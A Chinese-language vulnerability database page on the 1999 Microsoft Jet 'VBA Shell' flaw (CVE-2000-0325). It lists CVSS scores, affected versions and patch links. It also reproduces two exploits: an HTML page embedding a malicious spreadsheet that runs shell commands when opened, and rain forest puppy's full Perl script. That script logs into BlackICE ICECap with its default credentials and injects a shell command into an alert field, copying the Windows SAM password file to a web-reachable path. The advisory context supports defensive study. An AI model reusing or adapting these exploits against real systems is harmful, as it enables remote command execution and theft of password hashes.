CVE-2000-0325
CVSS7.2
发布时间 :1999-08-20 00:00:00
修订时间 :2008-09-10 15:04:05
NMCOEPS    

[原文]The Microsoft Jet database engine allows an attacker to execute commands via a database query, aka the "VBA Shell" vulnerability.


[CNNVD]Microsoft JET VBA Shell 漏洞(CNNVD-199908-038)

        Microsoft Jet数据库引擎存在漏洞。攻击者可以通过数据库请求执行命令,也称为"VBA Shell" 漏洞。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:jet:3.5.1Microsoft Jet 3.5.1
cpe:/a:microsoft:jet:3.5Microsoft Jet 3.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0325
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0325
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-038
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/3155.php
(UNKNOWN)  XF  jet-vba-shell(3155)
http://www.securityfocus.com/bid/548
(UNKNOWN)  BID  548
http://www.microsoft.com/technet/security/bulletin/ms99-030.asp
(UNKNOWN)  MS  MS99-030

- 漏洞信息

Microsoft JET VBA Shell 漏洞
高危 输入验证
1999-08-20 00:00:00 2005-10-20 00:00:00
远程  
        Microsoft Jet数据库引擎存在漏洞。攻击者可以通过数据库请求执行命令,也称为"VBA Shell" 漏洞。

- 公告与补丁

        Microsoft has made a patch available at the following url:
        http://officeupdate.microsoft.com/articles/mdac_typ.htm
        This was made public in a Microsoft Security Advisory published on August 20, 1999. The patch works by creating a "sandbox mode" for Jet 3.5x, and changing the implementation of sandbox mode in Jet 4.0.
        An additional patch made available by Microsoft, exists at the following location:
        http://office.microsoft.com/assistance/9798/mdac_typ.aspx
        Also, Wanderley J. Abreu Jr. has written a program that will search the registry and modify the EditFlags value for DocObjects file types, setting the Confirm Open After Download value to 01. this means that these filetypes can no longer be silently downloaded and opened. This can be downloaded from:
        http://www.securityfocus.com/data/vulnerabilities/patches/RegFix.zip

- 漏洞信息 (19435)

Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability (EDBID:19435)
windows remote
1999-07-29 Verified
0 BrootForce
N/A [点击下载]
source:http://www.securityfocus.com/bid/548/info

A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).

This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.

The file could be distributed via email, the web (including in hidden frames), or any number of methods. 

<HTML>
<HEAD>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
   <META NAME="Author" CONTENT="yeahright">
   <META NAME="GENERATOR" CONTENT="edit.com">
   <TITLE>exshell jexploit</TITLE>
</HEAD>
<BODY TEXT="#330033" BGCOLOR="#FFFFFF" LINK="#0000EE" VLINK="#551A8B" ALINK="#FF0000">
<FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>This
is a benign demonstration of the Jet 3.51 vulnerability documented by J.C.G.
Cuartango.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>This
vulnerability affects users of Office95/97 with Jet database engine versions
around 3.5 (tested 3.51.1029.00)</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>On the bottom of
this page is an invisible, embedded .xls file that will do a few things
if you double-click it:</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>1.&nbsp;
Get a welcome note from ftp.aol.com and write it to your hd as c:\ftptest.txt</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>2.&nbsp;
Write a log file of the ftp session to your hd as c:\jexploit.log</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>3.&nbsp;
Open regedit.exe on your computer.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>There
are no macros, so there are no macro warnings.&nbsp; There are currently
(8/3/99) no AV products to stop this.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>This
could be changed slightly to format your hd without prompts or perform
several other devastating functions.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>The
purpose of this demonstration is as follows:</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>1.&nbsp;
To have some innocent fun.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>2.&nbsp;
To demonstrate how to have fun.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>3.&nbsp;
To show the vulnerabilities in yet another M$ product.</FONT></FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>4.&nbsp;
To alert the AV people that they need to work on this problem.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>If you use IE
or see a broken link next to the arrow just click <A HREF="shell.xls"> here.</A>
&nbsp;&nbsp;Probably your browser can't view embedded xls.</FONT></FONT>
<BR><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1>
The malicious potential of this exploit is great.</FONT></FONT></FONT>

<P><FONT COLOR="#993366"><FONT FACE="ElegaGarmnd BT"><FONT SIZE=+1> 
Have a nice day!!!&nbsp;&nbsp;&nbsp;-ßrootFôrce</FONT></FONT></FONT>
<p>&nbsp;<p>

<BODY TEXT="#330033" BGCOLOR="#FFFFFF" LINK="#0000EE" VLINK="#551A8B" ALINK="#FF0000">
<FONT COLOR="#993366"><FONT FACE="Felix Titling"><FONT SIZE=+1>this
is a test of the emergency broadcast system.</FONT></FONT></FONT>

<P><FONT FACE="Felix Titling"><FONT COLOR="#993366"><FONT SIZE=+1>click
this here thingy to test==></FONT></FONT></FONT>&nbsp;
<EMBED src="shell.xls"  width=50 height=50></EMBED>
</BODY>
</HTML>

<IMG SRC="http://geo.yahoo.com/serv?s=76000007&t=933696590" WIDTH=1 HEIGHT=1>

<!-- <SERVICE NAME="toto"> -->
<SCRIPT LANGUAGE="javascript">
<!-- 
window.open('/toto?s=76000007', '_geo_toto', 'width=515,height=125');
// -->
</SCRIPT>
<!-- </SERVICE> -->
 		

- 漏洞信息 (F21847)

RFP2K04.txt (PacketStormID:F21847)
2000-05-17 00:00:00
rain forest puppy  wiretrip.net
exploit,shell
CVE-2000-0325
[点击下载]

RFP2K04 - Mining BlackICE with RFPickAxe. BlackICE IDS uses a management console called ICECap to collect and monitor alerts sent by the various installed BlackICE agents. The ICECap user console sits on port 8081 and has the default login of 'iceman' with no password. The second problem is that the software uses, by default, the Microsoft Jet 3.5 engine to store alerts. If you couple that with the shell VBA problem, that means you can push alerts that contain commands to be executed on the ICECap system. Includes RFPickaxe.pl demo exploit.

---/ RFP2K04 /----------------------------/ rfp.labs / wiretrip /---------

                     Mining BlackICE with RFPickAxe
          Remote command execution on BlackICE ICECap stations 
                                  
------------------------------------/ rain forest puppy / rfp@wiretrip.net

Table of contents:

-/ 1 / For the Black Hats
-/ 2 / For the White Hats
-/ 3 / Forward thinking
-/ 4 / You know you love perl.  Admit it.



--/ 1 / For the Black Hats /----------------------------------------------

BlackICE IDS uses a management console called ICECap to collect and
monitor alerts sent by the various installed BlackICE agents.  The ICECap
user console sits on port 8081 (included HTTP server), and alerts are
pushed to another server listening on port 8082.

The first problem is that the software uses a default login of 'iceman',
with no password.  This means we can log onto the console on port 8081, or
push it alerts on port 8082.  What could be more fun than a few false
alerts?

The second problem is that the software uses, by default, the Microsoft
Jet 3.5 engine to store alerts.  If you couple that with the shell VBA
problem (CVE: CAN-2000-0325), that means you can push alerts that contain
commands to be executed on the ICECap system.



--/ 2 / For the White Hats /----------------------------------------------

NetworkICE has released ICEcap v2.0.23a, as well as some supporting KB
articles detailing the problem.

ICEcap 2.0.23a
http://advice.networkice.com/advice/Support/KB/q000167/

Jet bug
http://advice.networkice.com/advice/Support/KB/q000164/

Easy injection bug
http://advice.networkice.com/advice/Support/KB/q000166/

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2000-0350 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems.



--/ 3 / Forward thinking /------------------------------------------------

I discussed this point at CanSecWest.  BlackICE is not the only (security)
application that stores data in a Microsoft .mdb file.  So what does use
.mdb's?  Well, NT 4.0 WINS, DHCP, CyberCop, NFR-GUI (Windows client), etc.

I leave as an exercise to the reader to look into it.  I'd appreciate
anyone doing research into these matters to drop me a note on their
final findings.



--/ 4 / You know you love perl.  Admit it. /-----------------------------

#!/usr/bin/perl
#
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
# Disclaimer: I do not provide technical support for my exploits!
#
# Sorry, this requires Unix, due to the `date` call

$|=1;
use Socket;

###############################################################

# IP of ICECap system (assumes port 8082)

$Target="10.10.200.4";

# account info - uses default 'iceman' w/ no password

$account="iceman";
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";

#-------- attributes of the alert ----------

$id="100005";
$issue_name="Exploit";
$sev="1";

# spoof these

$target="0.0.0.8";
$target_dns="some.host.com";
$det_ip="0.0.0.8";
$det_nbn="SENSOR";
$int_ip="255.255.255.255";
$param="Pickaxe";

# either fake the MAC, or use it to run commands via JET vulnerability

#$det_mac="0000000000000"; 
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
	"c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";

##############################################################


$inet=inet_aton($Target);

$time=`date -u "+%Y-%m-%d %T"`;
$time=~s/ /%20/g;
$time=~s/:/%3a/g;

#path is \program files\network ice\icecap\spatch\en

$alert="accountName=$account&issueID=$id&issueName=$issue_name".
	"&severity=$sev&targetNetAddress=$target&targetDNSName=".
	"$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
	"Name=$det_nbn&detectorMacAddress=$det_mac&".
	"intruderNetAddress=$int_ip&detectorType=3&startTime=".
	"$time¶meter=$param\r\n";

$len=length($alert);

@DXX=();
$send=<<EOT
POST / HTTP/1.0
User-Agent: netice-alerter/1.0
Host: $Target:8082
Authorization: Basic $httpauth
Content-Type: application/x-www-form-urlencoded
Content-Length: $len

EOT
;

$send=~s/\n/\r\n/g;
$send=$send.$alert;

sendraw("$send");

print @DXX;

exit;

sub sendraw { 	# raw network functions stay in here
	my ($pstr)=@_;
	$PROTO=getprotobyname('tcp')||0;

	# AF_INET=2 SOCK_STREAM=1
	eval {
	alarm(30);
	if(!(socket(S,2,1,$PROTO))){ die("socket");}
	if(connect(S,pack "SnA4x8",2,8082,$inet)){
		# multi-column perl coding...don't do as I do ;)
		select(S); 	$|=1;
		print $pstr; 	
		@DXX=<S>; 
		select(STDOUT); close(S); 
		alarm(0); 	return;
	} else { die("not responding"); }
	alarm(0);};
 	if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}}	




----/ acks /--------------------------------------------------------------

      NetworkICE + eEye, Attrition, w00w00, ADM, Technotronic, USSR

------------------------------------/ rain forest puppy / rfp@wiretrip.net

       If anyone wants to donate a skin to my website, contact me.

---/ RFP2K04 /----------------------------/ rfp.labs / wiretrip /---------


    

- 漏洞信息

59322
Microsoft Jet Database Crafted Query Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Unknown Vendor Verified

- 漏洞描述

Jet Database contains a flaw that may allow an attacker to execute arbitrary commands. The issue is triggered when a malicious user submits a specially crafted database query.

- 时间线

1999-08-20 Unknow
Unknow 1999-08-20

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft Corporation has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft JET VBA Shell Vulnerability
Input Validation Error 548
Yes No
1999-07-29 12:00:00 2009-07-11 12:56:00
This vulnerability was discovered and posted to NTBugtraq by Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>.

- 受影响的程序版本

Microsoft JET 4.0
+ Microsoft Access 2000
+ Microsoft Access 2000
Microsoft JET 3.51
+ Microsoft Excel 95
+ Microsoft Excel 95
+ Microsoft Excel 97
+ Microsoft Excel 97
Microsoft JET 3.5
+ Microsoft Access 95
+ Microsoft Access 95
+ Microsoft Access 97
+ Microsoft Access 97
Microsoft JET 4.0 SP1
Microsoft JET 3.51 SP3

- 不受影响的程序版本

Microsoft JET 4.0 SP1
Microsoft JET 3.51 SP3

- 漏洞讨论

A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).

This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.

The file could be distributed via email, the web (including in hidden frames), or any number of methods.

- 漏洞利用

This exploit by BrootForce &lt;brootforce@emailsecurity.com&gt; is a modified version of Juan Cuartango's original demonstration exploit.

- 解决方案

Microsoft has made a patch available at the following url:
http://officeupdate.microsoft.com/articles/mdac_typ.htm
This was made public in a Microsoft Security Advisory published on August 20, 1999. The patch works by creating a "sandbox mode" for Jet 3.5x, and changing the implementation of sandbox mode in Jet 4.0.

An additional patch made available by Microsoft, exists at the following location:
http://office.microsoft.com/assistance/9798/mdac_typ.aspx

Also, Wanderley J. Abreu Jr. <storm@UNIKEY.COM.BR> has written a program that will search the registry and modify the EditFlags value for DocObjects file types, setting the Confirm Open After Download value to 01. this means that these filetypes can no longer be silently downloaded and opened. This can be downloaded from:
http://www.securityfocus.com/data/vulnerabilities/patches/RegFix.zip

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站